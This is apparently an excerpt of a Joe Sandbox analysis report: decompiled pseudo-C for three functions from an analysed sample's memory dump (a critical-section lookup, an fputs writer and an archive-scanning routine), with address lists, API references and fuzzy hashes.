                                                                                                    Function 003E33F1 Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 95%
                                                                                                    			E003E33F1(void* __ecx) {
				signed int _t19;
				signed int _t20;
				signed int _t24;
				intOrPtr _t28;
				void* _t40;
				signed int _t42;
				void* _t43;

				E0041F1B0(0x425f40, _t43);
				_push(__ecx);
				_t40 = __ecx;
				 *(_t43 - 0x10) = 0x43a858;
				EnterCriticalSection(0x43a858);
				_t28 =  *((intOrPtr*)(_t40 + 0x18));
				_t24 =  *(_t43 + 0xc);
				_t19 = 0;
				 *((intOrPtr*)(_t43 - 4)) = 0;
				if(_t28 <= 0) {
					L4:
					LeaveCriticalSection(0x43a858);
					if(_t24 > 0) {
						_t24 = _t24 & 0x0000ffff | 0x80070000;
					}
					_t20 = _t24;
				} else {
					 *(_t43 + 0xc) =  *(_t40 + 0x14);
					while( *( *(_t43 + 0xc)) !=  *((intOrPtr*)(_t43 + 8))) {
						 *(_t43 + 0xc) =  *(_t43 + 0xc) + 4;
						_t19 = _t19 + 1;
						if(_t19 < _t28) {
							continue;
						} else {
							goto L4;
						}
						goto L7;
					}
					_t42 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t40 + 0x2c)))) + 0x20))( *((intOrPtr*)( *((intOrPtr*)(_t40 + 0x20)) + _t19 * 4)), _t24);
					if(_t42 == 0) {
						goto L4;
					} else {
						LeaveCriticalSection(0x43a858);
						_t20 = _t42;
					}
				}
				L7:
				 *[fs:0x0] =  *((intOrPtr*)(_t43 - 0xc));
				return _t20;
			}










                                                                                                    0x003e33f6
                                                                                                    0x003e33fb
                                                                                                    0x003e3404
                                                                                                    0x003e3407
                                                                                                    0x003e340a
                                                                                                    0x003e3410
                                                                                                    0x003e3413
                                                                                                    0x003e3416
                                                                                                    0x003e341a
                                                                                                    0x003e341d
                                                                                                    0x003e3438
                                                                                                    0x003e3439
                                                                                                    0x003e3441
                                                                                                    0x003e3449
                                                                                                    0x003e3449
                                                                                                    0x003e344f
                                                                                                    0x003e341f
                                                                                                    0x003e3422
                                                                                                    0x003e3425
                                                                                                    0x003e342f
                                                                                                    0x003e3433
                                                                                                    0x003e3436
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003e3436
                                                                                                    0x003e3472
                                                                                                    0x003e3476
                                                                                                    0x00000000
                                                                                                    0x003e3478
                                                                                                    0x003e3479
                                                                                                    0x003e347f
                                                                                                    0x003e347f
                                                                                                    0x003e3476
                                                                                                    0x003e3451
                                                                                                    0x003e3457
                                                                                                    0x003e345f

                                                                                                    APIs
                                                                                                    • __EH_prolog.LIBCMT ref: 003E33F6
                                                                                                    • EnterCriticalSection.KERNEL32(0043A858), ref: 003E340A
                                                                                                    • LeaveCriticalSection.KERNEL32(0043A858), ref: 003E3439
                                                                                                    • LeaveCriticalSection.KERNEL32(0043A858), ref: 003E3479
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.818748800.00000000003B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003B0000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.818711426.00000000003B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819217768.0000000000429000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819297153.000000000043A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819348357.0000000000442000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_3b0000_7g.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CriticalSection$Leave$EnterH_prolog
                                                                                                    • String ID:
                                                                                                    • API String ID: 2532973370-0
                                                                                                    • Opcode ID: 722286c51611dcac9ecfbd64fdf6fc6724790b1e791cb0f92261d6fc494dce8a
                                                                                                    • Instruction ID: 714742dd689757b0e1c099d1d79b93300f4e21e626d2e5336d828678c1a10a5a
                                                                                                    • Opcode Fuzzy Hash: 722286c51611dcac9ecfbd64fdf6fc6724790b1e791cb0f92261d6fc494dce8a
                                                                                                    • Instruction Fuzzy Hash: 77116D75B00224EBC722DF26D48896EB7A5FF89710B50826DE81AD7740C734ED058F60
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 003EC51A Relevance: 6.0, APIs: 4, Instructions: 35COMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 100%
                                                                                                    			E003EC51A(struct _IO_FILE** __ecx, void* __edx, void* __eflags) {
				void* _t17;
				struct _IO_FILE** _t27;
				void* _t33;

				E0041F1B0(E004269A8, _t33);
				_t27 = __ecx;
				E003B2690(_t33 - 0x18);
				 *(_t33 - 4) =  *(_t33 - 4) & 0x00000000;
				E003E44FB(_t33 - 0x18, __edx);
				fputs( *(_t33 + 8),  *_t27);
				fputs(0x42cfc8,  *_t27);
				fputs( *(_t33 - 0x18),  *_t27);
				_t17 = E003B1E40(E003B1FA0(_t27),  *(_t33 - 0x18));
				 *[fs:0x0] =  *((intOrPtr*)(_t33 - 0xc));
				return _t17;
			}






                                                                                                    0x003ec51f
                                                                                                    0x003ec529
                                                                                                    0x003ec530
                                                                                                    0x003ec535
                                                                                                    0x003ec53e
                                                                                                    0x003ec54e
                                                                                                    0x003ec557
                                                                                                    0x003ec55e
                                                                                                    0x003ec56d
                                                                                                    0x003ec578
                                                                                                    0x003ec580

                                                                                                    APIs
                                                                                                    • __EH_prolog.LIBCMT ref: 003EC51F
                                                                                                    • fputs.MSVCRT ref: 003EC54E
                                                                                                    • fputs.MSVCRT ref: 003EC557
                                                                                                    • fputs.MSVCRT ref: 003EC55E
                                                                                                      • Part of subcall function 003B1FA0: fputc.MSVCRT ref: 003B1FA7
                                                                                                      • Part of subcall function 003B1E40: free.MSVCRT(?,003D6B41,00000000,00000000,00000001,?,003B10EB), ref: 003B1E44
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.818748800.00000000003B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003B0000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.818711426.00000000003B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819217768.0000000000429000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819297153.000000000043A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819348357.0000000000442000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_3b0000_7g.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: fputs$H_prologfputcfree
                                                                                                    • String ID:
                                                                                                    • API String ID: 3247574066-0
                                                                                                    • Opcode ID: 424ea7361135f0abf97ec443d8e931fefe7f017270a66a6420bf10924d3f2f6a
                                                                                                    • Instruction ID: 5e603cdfd84c0f6bac3aefe64234b229437fd065bda314d19cdd8dd4bd8803b9
                                                                                                    • Opcode Fuzzy Hash: 424ea7361135f0abf97ec443d8e931fefe7f017270a66a6420bf10924d3f2f6a
                                                                                                    • Instruction Fuzzy Hash: 1DF06D32E00015ABCB06BB99DC52AEEBF72EF84354F54402AE905661A1DF751961DAC4
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 003D29D4 Relevance: 5.7, APIs: 2, Strings: 1, Instructions: 443COMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 76%
                                                                                                    			E003D29D4(void* __ecx, signed int __edx, void* __eflags) {
				signed int _t223;
				signed int _t225;
				signed int _t226;
				void* _t228;
				signed int _t230;
				signed int _t236;
				signed int _t240;
				signed int _t242;
				signed int _t245;
				void* _t250;
				void* _t251;
				signed int _t255;
				signed char _t261;
				signed int _t265;
				signed int _t275;
				intOrPtr _t277;
				signed int _t283;
				signed int _t294;
				signed int _t297;
				intOrPtr* _t302;
				signed int _t312;
				signed int _t332;
				signed int _t351;
				signed int _t368;
				signed int _t392;
				signed int _t396;
				signed int _t398;
				signed int _t399;
				intOrPtr* _t400;
				void* _t404;

				E0041F1B0(E00424BC6, _t404);
				 *(_t404 - 0x10) = __edx;
				E003CEE23(_t404 - 0x160);
				_t223 =  *(_t404 - 0x10);
				_t392 =  *(_t404 + 0xc);
				_t312 = 0;
				 *(_t404 - 0xc8) = _t392;
				_t410 =  *((intOrPtr*)(_t223 + 0xe));
				 *(_t404 - 4) = 0;
				if( *((intOrPtr*)(_t223 + 0xe)) == 0) {
					_t225 =  *((intOrPtr*)( *_t392 + 8))();
					__eflags = _t225;
					if(_t225 == 0) {
						_t226 =  *(_t404 - 0x10);
						 *((char*)(_t404 - 0x130)) =  *((intOrPtr*)(_t226 + 0x10));
						 *((char*)(_t404 - 0x12f)) =  *((intOrPtr*)(_t226 + 0xf));
						 *((char*)(_t404 - 0x12c)) =  *((intOrPtr*)(_t226 + 0xd));
						 *((char*)(_t404 - 0x12e)) =  *((intOrPtr*)(__ecx + 0xc));
						 *((char*)(_t404 - 0x12d)) =  *((intOrPtr*)(__ecx + 0xd));
						_t228 = E003B2D47(_t404 - 0x50);
						 *(_t404 - 4) = 2;
						_push(_t404 - 0x160);
						_push(_t228);
						_t390 =  *((intOrPtr*)( *(_t404 - 0x10) + 0x14));
						_t230 = E003CF237(__ecx,  *((intOrPtr*)( *(_t404 - 0x10) + 0x14)));
						 *(_t404 - 4) =  *(_t404 - 4) & 0x00000000;
						_t396 = _t230;
						E003B1E40(_t230,  *((intOrPtr*)(_t404 - 0x50)));
						__eflags = _t396;
						if(_t396 == 0) {
							_t225 =  *((intOrPtr*)( *_t392 + 0xc))(_t404 - 0x128);
							__eflags = _t225;
							if(_t225 != 0) {
								goto L3;
							}
							goto L8;
						}
						__eflags = _t396 - 0x80004004;
						if(_t396 != 0x80004004) {
							E003B2711( *(_t404 + 8), "Scanning error");
						}
						goto L68;
					}
					L3:
					_t396 = _t225;
					goto L68;
				} else {
					E003D2F93(_t404 - 0x1bc, _t410);
					 *(_t404 - 0x1bc) =  *(_t404 - 0x1bc) | 0xffffffff;
					 *(_t404 - 0x1b8) =  *(_t404 - 0x1b8) | 0xffffffff;
					 *(_t404 - 4) = 1;
					 *((intOrPtr*)(_t404 - 0x19c)) = 0;
					E003EF23F(_t404 - 0x13c);
					_push(_t404 - 0x1bc);
					E003D6106(_t404 - 0x13c);
					 *(_t404 - 4) =  *(_t404 - 4) & 0;
					E003D0C01(_t404 - 0x1bc);
					L8:
					E003D2FC1(_t404 - 0xc0);
					_t398 =  *(_t404 - 0x10);
					_push(_t398);
					 *(_t404 - 4) = 3;
					_t236 = E003D23C0(_t404 - 0xc0);
					if(_t236 == _t312) {
						__eflags =  *((char*)(_t398 + 0xe));
						 *((intOrPtr*)(_t404 - 0x88)) =  *((intOrPtr*)(_t404 - 0x100));
						 *((intOrPtr*)(_t404 - 0x84)) =  *((intOrPtr*)(_t404 - 0xfc));
						 *(_t404 - 0x24) = _t312;
						 *(_t404 - 0x20) = _t312;
						if( *((char*)(_t398 + 0xe)) == 0) {
							_t332 =  *(_t404 - 0x10c);
							_t240 =  *((intOrPtr*)(_t404 - 0x110)) +  *((intOrPtr*)(_t404 - 0x108));
							__eflags = _t240;
							_t390 =  *_t392;
							asm("adc ecx, [ebp-0x104]");
							 *(_t404 - 0x24) = _t240;
							 *(_t404 - 0x20) = _t332;
							_t236 =  *((intOrPtr*)( *_t392 + 0x14))(_t240, _t332);
						} else {
							_t236 =  *((intOrPtr*)( *_t392 + 0x10))(1, _t312);
						}
						__eflags = _t236 - _t312;
						if(_t236 != _t312) {
							goto L9;
						} else {
							 *(_t404 - 4) = 4;
							_t242 = E0040B350(0x8000);
							__eflags = _t242 - _t312;
							 *(_t404 + 8) = _t242;
							__eflags = _t242 & 0xffffff00 | _t242 != _t312;
							if((_t242 & 0xffffff00 | _t242 != _t312) != 0) {
								 *(_t404 - 0x40) = _t312;
								 *(_t404 - 0x3c) = _t312;
								_t245 =  *((intOrPtr*)( *_t392 + 0x20))(_t404 - 0xc0);
								__eflags = _t245 - _t312;
								if(_t245 != _t312) {
									L65:
									_t396 = _t245;
									L66:
									E0040B370( *(_t404 + 8));
									L67:
									 *(_t404 - 4) =  *(_t404 - 4) & 0x00000000;
									E003D302F(_t404 - 0xc0);
									L68:
									 *(_t404 - 4) =  *(_t404 - 4) | 0xffffffff;
									E003D06AE(_t404 - 0x160);
									 *[fs:0x0] =  *((intOrPtr*)(_t404 - 0xc));
									return _t396;
								}
								__eflags =  *((intOrPtr*)(_t404 - 0x138)) - _t312;
								 *(_t404 - 0x14) = _t312;
								if( *((intOrPtr*)(_t404 - 0x138)) <= _t312) {
									L64:
									_t245 =  *((intOrPtr*)( *_t392 + 0x30))(_t404 - 0xc0);
									goto L65;
								}
								while(1) {
									 *(_t404 + 0xc) = _t312;
									 *(_t404 - 4) = 5;
									E003B2D47(_t404 - 0x30);
									 *(_t404 - 0x18) =  *(_t404 - 0x18) & 0x00000000;
									 *(_t404 - 0x54) =  *(_t404 - 0x54) & 0x00000000;
									__eflags =  *((char*)(_t398 + 0xe));
									 *(_t404 - 4) = 6;
									if( *((char*)(_t398 + 0xe)) == 0) {
										goto L25;
									}
									_push(8);
									_t302 = E003B1E0C();
									__eflags = _t302 - _t312;
									if(_t302 == _t312) {
										_t302 = 0;
										__eflags = 0;
									} else {
										 *(_t302 + 4) = _t312;
										 *_t302 = 0x42af84;
									}
									L00403CED(_t404 + 0xc, _t302);
									L47:
									_t396 =  *((intOrPtr*)( *_t392 + 0x24))( *((intOrPtr*)(_t404 - 0x30)),  *(_t404 - 0x18));
									__eflags = _t396 - _t312;
									if(_t396 != _t312) {
										L60:
										_push( *((intOrPtr*)(_t404 - 0x30)));
										L61:
										E003B1E40(_t263);
										_t265 =  *(_t404 + 0xc);
										 *(_t404 - 4) = 4;
										__eflags = _t265 - _t312;
										L62:
										if(__eflags != 0) {
											 *((intOrPtr*)( *_t265 + 8))(_t265);
										}
										goto L66;
									}
									 *(_t404 - 0x38) = _t312;
									 *(_t404 - 0x34) = _t312;
									E003D279A(_t404 - 0xc0);
									__eflags =  *(_t404 - 0x18);
									if( *(_t404 - 0x18) != 0) {
										L55:
										_t351 = _t404 - 0xc0;
										E003D2893(_t351, _t390,  *(_t404 - 0x18),  *(_t404 - 0x54), _t404 - 0x30);
										__eflags =  *(_t404 - 0x18);
										_t396 =  *((intOrPtr*)( *_t392 + 0x2c))( *(_t404 - 0x38),  *(_t404 - 0x34), _t404 - 0xc0, _t351 & 0xffffff00 |  *(_t404 - 0x18) == 0x00000000);
										__eflags = _t396 - _t312;
										if(_t396 != _t312) {
											goto L60;
										}
										_t396 =  *((intOrPtr*)( *_t392 + 0x18))(_t404 - 0x40);
										_push( *((intOrPtr*)(_t404 - 0x30)));
										__eflags = _t396 - _t312;
										if(_t396 != _t312) {
											goto L61;
										}
										E003B1E40(_t263);
										 *(_t404 - 4) = 4;
										E003DCFEF(_t404 + 0xc);
										L37:
										 *(_t404 - 0x14) =  *(_t404 - 0x14) + 1;
										__eflags =  *(_t404 - 0x14) -  *((intOrPtr*)(_t404 - 0x138));
										if( *(_t404 - 0x14) <  *((intOrPtr*)(_t404 - 0x138))) {
											_t398 =  *(_t404 - 0x10);
											continue;
										}
										goto L64;
									}
									 *(_t404 - 0x1c) = _t312;
									while(1) {
										__eflags =  *(_t404 - 0x1c);
										if( *(_t404 - 0x1c) != 0) {
											goto L52;
										}
										L51:
										_t396 =  *((intOrPtr*)( *_t392 + 0x18))(_t404 - 0x40);
										__eflags = _t396 - _t312;
										if(_t396 != _t312) {
											goto L60;
										}
										L52:
										_t275 =  *(_t404 + 0xc);
										_t390 = _t404 - 0x44;
										_t396 =  *((intOrPtr*)( *_t275 + 0xc))(_t275,  *(_t404 + 8), 0x8000, _t404 - 0x44);
										__eflags = _t396 - _t312;
										if(_t396 != _t312) {
											goto L60;
										}
										__eflags =  *((intOrPtr*)(_t404 - 0x44)) - _t312;
										if( *((intOrPtr*)(_t404 - 0x44)) == _t312) {
											goto L55;
										}
										E003D27DD(_t404 - 0xc0,  *(_t404 + 8),  *((intOrPtr*)(_t404 - 0x44)));
										_t277 =  *((intOrPtr*)(_t404 - 0x44));
										 *(_t404 - 0x38) =  *(_t404 - 0x38) + _t277;
										asm("adc [ebp-0x34], ecx");
										 *(_t404 - 0x40) =  *(_t404 - 0x40) + _t277;
										asm("adc [ebp-0x3c], ecx");
										 *(_t404 - 0x1c) =  *(_t404 - 0x1c) + 1;
										__eflags =  *(_t404 - 0x1c);
										if( *(_t404 - 0x1c) != 0) {
											goto L52;
										}
										goto L51;
									}
									L25:
									_t399 =  *(_t404 - 0x14);
									_t250 = E003CED78(_t404 - 0x160, _t404 - 0x16c, _t399);
									 *(_t404 - 4) = 7;
									_t251 = E003B2F2F(_t404 - 0x30, _t250);
									 *(_t404 - 4) = 6;
									E003B1E40(_t251,  *((intOrPtr*)(_t404 - 0x16c)));
									_t400 =  *((intOrPtr*)( *((intOrPtr*)(_t404 - 0x13c)) + _t399 * 4));
									__eflags =  *((intOrPtr*)(_t400 + 0x38)) - _t312;
									 *(_t404 - 0x54) =  *((intOrPtr*)(_t400 + 0x24));
									if( *((intOrPtr*)(_t400 + 0x38)) == _t312) {
										_push(0x88);
										_t255 = E003B1E0C();
										 *(_t404 - 0x1c) = _t255;
										__eflags = _t255 - _t312;
										 *(_t404 - 4) = 8;
										if(_t255 != _t312) {
											_t312 = E003BAC99(_t255);
										}
										 *(_t404 - 4) = 6;
										 *((char*)(_t312 + 0x1c)) =  *((intOrPtr*)( *(_t404 - 0x10) + 0xc));
										L00403CED(_t404 + 0xc, _t312);
										_t261 =  *(_t400 + 0x20) >> 0x00000004 & 0x00000001;
										__eflags = _t261;
										 *(_t404 - 0x18) = _t261;
										if(_t261 != 0) {
											L46:
											_t312 = 0;
											__eflags = 0;
											goto L47;
										} else {
											E003CED4D(_t404 - 0x160, _t404 - 0x50,  *(_t404 - 0x14));
											 *(_t404 - 4) = 9;
											 *(_t312 + 0x7c) =  *(_t312 + 0x7c) & 0x00000000;
											 *((char*)(_t404 - 0x60)) =  *((intOrPtr*)( *(_t404 - 0x10) + 0xd));
											_t283 = E003B77F6( *((intOrPtr*)(_t404 - 0x50)),  *((intOrPtr*)(_t404 - 0x60)));
											__eflags = _t283;
											if(_t283 != 0) {
												_t284 =  *(_t404 - 0x10);
												__eflags =  *((char*)(_t284 + 0xe));
												if( *((char*)(_t284 + 0xe)) != 0) {
													L45:
													 *(_t404 - 4) = 6;
													E003B1E40(_t284,  *((intOrPtr*)(_t404 - 0x50)));
													goto L46;
												}
												 *(_t404 - 0x5c) =  *(_t404 - 0x5c) & 0x00000000;
												 *(_t404 - 0x58) =  *(_t404 - 0x58) & 0x00000000;
												_t284 =  *((intOrPtr*)( *((intOrPtr*)(_t312 + 4)) + 0xc))(_t312 + 4, _t404 - 0x5c);
												__eflags = _t284;
												if(_t284 != 0) {
													goto L45;
												}
												_t390 =  *_t400;
												_t284 =  *(_t404 - 0x58);
												_t368 =  *(_t404 - 0x5c);
												__eflags =  *(_t404 - 0x58) -  *((intOrPtr*)(_t400 + 4));
												if(__eflags < 0) {
													goto L45;
												}
												if(__eflags > 0) {
													L44:
													asm("sbb eax, esi");
													 *(_t404 - 0x24) =  *(_t404 - 0x24) + _t368 - _t390;
													asm("adc [ebp-0x20], eax");
													_t396 =  *((intOrPtr*)( *_t392 + 0x14))( *(_t404 - 0x24),  *(_t404 - 0x20));
													__eflags = _t396;
													if(_t396 != 0) {
														_push( *((intOrPtr*)(_t404 - 0x50)));
														L59:
														E003B1E40(E003B1E40(_t284),  *((intOrPtr*)(_t404 - 0x30)));
														_t265 =  *(_t404 + 0xc);
														 *(_t404 - 4) = 4;
														__eflags = _t265;
														goto L62;
													}
													goto L45;
												}
												__eflags = _t368 - _t390;
												if(_t368 <= _t390) {
													goto L45;
												}
												goto L44;
											}
											_t284 =  *((intOrPtr*)( *_t392 + 0x28))(_t404 - 0x50, GetLastError());
											 *((intOrPtr*)(_t404 - 0x88)) =  *((intOrPtr*)(_t404 - 0x88)) + 1;
											_t396 = _t284;
											_push( *((intOrPtr*)(_t404 - 0x50)));
											asm("adc dword [ebp-0x84], 0x0");
											__eflags = _t396 - 1;
											if(_t396 != 1) {
												goto L59;
											}
											E003B1E40(E003B1E40(_t284),  *((intOrPtr*)(_t404 - 0x30)));
											_t294 =  *(_t404 + 0xc);
											__eflags = _t294;
											 *(_t404 - 4) = 4;
											if(_t294 != 0) {
												 *((intOrPtr*)( *_t294 + 8))(_t294);
											}
											_t312 = 0;
											__eflags = 0;
											goto L37;
										}
									}
									_push(0x20);
									_t297 = E003B1E0C();
									__eflags = _t297 - _t312;
									if(_t297 != _t312) {
										 *(_t297 + 4) = _t312;
										 *(_t297 + 0x1c) = _t312;
										 *_t297 = 0x429c3c;
										_t312 = _t297;
									}
									L00403CED(_t404 + 0xc, _t312);
									 *((intOrPtr*)(_t312 + 0x18)) =  *((intOrPtr*)(_t400 + 0x38));
									 *((intOrPtr*)(_t312 + 0x10)) = 0;
									_t104 = _t312 + 0x1c; // 0x1c
									 *((intOrPtr*)(_t312 + 8)) =  *((intOrPtr*)(_t400 + 0x34));
									 *((intOrPtr*)(_t312 + 0x14)) = 0;
									L00403CED(_t104, 0);
									goto L46;
								}
							}
							_t396 = 0x8007000e;
							goto L66;
						}
					}
					L9:
					_t396 = _t236;
					goto L67;
				}
			}

































                                                                                                    0x003d29d9
                                                                                                    0x003d29e9
                                                                                                    0x003d29f2
                                                                                                    0x003d29f7
                                                                                                    0x003d29fa
                                                                                                    0x003d29fd
                                                                                                    0x003d29ff
                                                                                                    0x003d2a05
                                                                                                    0x003d2a08
                                                                                                    0x003d2a0b
                                                                                                    0x003d2a64
                                                                                                    0x003d2a67
                                                                                                    0x003d2a69
                                                                                                    0x003d2a72
                                                                                                    0x003d2a78
                                                                                                    0x003d2a84
                                                                                                    0x003d2a8d
                                                                                                    0x003d2a93
                                                                                                    0x003d2a9c
                                                                                                    0x003d2aa5
                                                                                                    0x003d2ab0
                                                                                                    0x003d2ab4
                                                                                                    0x003d2ab5
                                                                                                    0x003d2abb
                                                                                                    0x003d2abe
                                                                                                    0x003d2ac3
                                                                                                    0x003d2ac7
                                                                                                    0x003d2acc
                                                                                                    0x003d2ad1
                                                                                                    0x003d2ad4
                                                                                                    0x003d2aff
                                                                                                    0x003d2b02
                                                                                                    0x003d2b04
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003d2b04
                                                                                                    0x003d2ad6
                                                                                                    0x003d2adc
                                                                                                    0x003d2aea
                                                                                                    0x003d2aea
                                                                                                    0x00000000
                                                                                                    0x003d2adc
                                                                                                    0x003d2a6b
                                                                                                    0x003d2a6b
                                                                                                    0x00000000
                                                                                                    0x003d2a0d
                                                                                                    0x003d2a13
                                                                                                    0x003d2a18
                                                                                                    0x003d2a1f
                                                                                                    0x003d2a2c
                                                                                                    0x003d2a30
                                                                                                    0x003d2a36
                                                                                                    0x003d2a47
                                                                                                    0x003d2a48
                                                                                                    0x003d2a4d
                                                                                                    0x003d2a56
                                                                                                    0x003d2b0a
                                                                                                    0x003d2b10
                                                                                                    0x003d2b15
                                                                                                    0x003d2b1e
                                                                                                    0x003d2b1f
                                                                                                    0x003d2b23
                                                                                                    0x003d2b2a
                                                                                                    0x003d2b39
                                                                                                    0x003d2b3d
                                                                                                    0x003d2b49
                                                                                                    0x003d2b4f
                                                                                                    0x003d2b52
                                                                                                    0x003d2b55
                                                                                                    0x003d2b69
                                                                                                    0x003d2b6f
                                                                                                    0x003d2b6f
                                                                                                    0x003d2b75
                                                                                                    0x003d2b77
                                                                                                    0x003d2b7d
                                                                                                    0x003d2b80
                                                                                                    0x003d2b87
                                                                                                    0x003d2b57
                                                                                                    0x003d2b5e
                                                                                                    0x003d2b5e
                                                                                                    0x003d2b8a
                                                                                                    0x003d2b8c
                                                                                                    0x00000000
                                                                                                    0x003d2b8e
                                                                                                    0x003d2b93
                                                                                                    0x003d2b97
                                                                                                    0x003d2b9c
                                                                                                    0x003d2b9e
                                                                                                    0x003d2ba4
                                                                                                    0x003d2ba6
                                                                                                    0x003d2bbd
                                                                                                    0x003d2bc0
                                                                                                    0x003d2bc3
                                                                                                    0x003d2bc6
                                                                                                    0x003d2bc8
                                                                                                    0x003d2f40
                                                                                                    0x003d2f40
                                                                                                    0x003d2f42
                                                                                                    0x003d2f45
                                                                                                    0x003d2f4a
                                                                                                    0x003d2f4a
                                                                                                    0x003d2f54
                                                                                                    0x003d2f59
                                                                                                    0x003d2f59
                                                                                                    0x003d2f63
                                                                                                    0x003d2f70
                                                                                                    0x003d2f78
                                                                                                    0x003d2f78
                                                                                                    0x003d2bce
                                                                                                    0x003d2bd4
                                                                                                    0x003d2bd7
                                                                                                    0x003d2f32
                                                                                                    0x003d2f3d
                                                                                                    0x00000000
                                                                                                    0x003d2f3d
                                                                                                    0x003d2be2
                                                                                                    0x003d2be2
                                                                                                    0x003d2be8
                                                                                                    0x003d2bec
                                                                                                    0x003d2bf1
                                                                                                    0x003d2bf5
                                                                                                    0x003d2bf9
                                                                                                    0x003d2bfd
                                                                                                    0x003d2c01
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003d2c03
                                                                                                    0x003d2c05
                                                                                                    0x003d2c0a
                                                                                                    0x003d2c0d
                                                                                                    0x003d2c1a
                                                                                                    0x003d2c1a
                                                                                                    0x003d2c0f
                                                                                                    0x003d2c0f
                                                                                                    0x003d2c12
                                                                                                    0x003d2c12
                                                                                                    0x003d2c20
                                                                                                    0x003d2e00
                                                                                                    0x003d2e0d
                                                                                                    0x003d2e0f
                                                                                                    0x003d2e11
                                                                                                    0x003d2f16
                                                                                                    0x003d2f16
                                                                                                    0x003d2f19
                                                                                                    0x003d2f19
                                                                                                    0x003d2f1e
                                                                                                    0x003d2f22
                                                                                                    0x003d2f26
                                                                                                    0x003d2f28
                                                                                                    0x003d2f28
                                                                                                    0x003d2f2d
                                                                                                    0x003d2f2d
                                                                                                    0x00000000
                                                                                                    0x003d2f28
                                                                                                    0x003d2e1d
                                                                                                    0x003d2e20
                                                                                                    0x003d2e23
                                                                                                    0x003d2e28
                                                                                                    0x003d2e2c
                                                                                                    0x003d2e97
                                                                                                    0x003d2e9a
                                                                                                    0x003d2ea7
                                                                                                    0x003d2eac
                                                                                                    0x003d2ec8
                                                                                                    0x003d2eca
                                                                                                    0x003d2ecc
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003d2ed9
                                                                                                    0x003d2edb
                                                                                                    0x003d2ede
                                                                                                    0x003d2ee0
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003d2ee2
                                                                                                    0x003d2ee8
                                                                                                    0x003d2eef
                                                                                                    0x003d2d81
                                                                                                    0x003d2d81
                                                                                                    0x003d2d87
                                                                                                    0x003d2d8d
                                                                                                    0x003d2bdf
                                                                                                    0x00000000
                                                                                                    0x003d2bdf
                                                                                                    0x00000000
                                                                                                    0x003d2d93
                                                                                                    0x003d2e2e
                                                                                                    0x003d2e31
                                                                                                    0x003d2e31
                                                                                                    0x003d2e35
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003d2e37
                                                                                                    0x003d2e42
                                                                                                    0x003d2e44
                                                                                                    0x003d2e46
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003d2e4c
                                                                                                    0x003d2e4c
                                                                                                    0x003d2e4f
                                                                                                    0x003d2e61
                                                                                                    0x003d2e63
                                                                                                    0x003d2e65
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003d2e6b
                                                                                                    0x003d2e6e
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003d2e7c
                                                                                                    0x003d2e81
                                                                                                    0x003d2e86
                                                                                                    0x003d2e89
                                                                                                    0x003d2e8c
                                                                                                    0x003d2e8f
                                                                                                    0x003d2e92
                                                                                                    0x003d2e31
                                                                                                    0x003d2e35
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003d2e35
                                                                                                    0x003d2c2a
                                                                                                    0x003d2c2a
                                                                                                    0x003d2c3b
                                                                                                    0x003d2c44
                                                                                                    0x003d2c48
                                                                                                    0x003d2c4d
                                                                                                    0x003d2c57
                                                                                                    0x003d2c63
                                                                                                    0x003d2c69
                                                                                                    0x003d2c6c
                                                                                                    0x003d2c6f
                                                                                                    0x003d2cb6
                                                                                                    0x003d2cbb
                                                                                                    0x003d2cc1
                                                                                                    0x003d2cc4
                                                                                                    0x003d2cc6
                                                                                                    0x003d2cca
                                                                                                    0x003d2cd3
                                                                                                    0x003d2cd3
                                                                                                    0x003d2cdc
                                                                                                    0x003d2ce3
                                                                                                    0x003d2ce6
                                                                                                    0x003d2cf1
                                                                                                    0x003d2cf1
                                                                                                    0x003d2cf3
                                                                                                    0x003d2cf6
                                                                                                    0x003d2dfe
                                                                                                    0x003d2dfe
                                                                                                    0x003d2dfe
                                                                                                    0x00000000
                                                                                                    0x003d2cfc
                                                                                                    0x003d2d09
                                                                                                    0x003d2d14
                                                                                                    0x003d2d1b
                                                                                                    0x003d2d1f
                                                                                                    0x003d2d28
                                                                                                    0x003d2d2d
                                                                                                    0x003d2d2f
                                                                                                    0x003d2d98
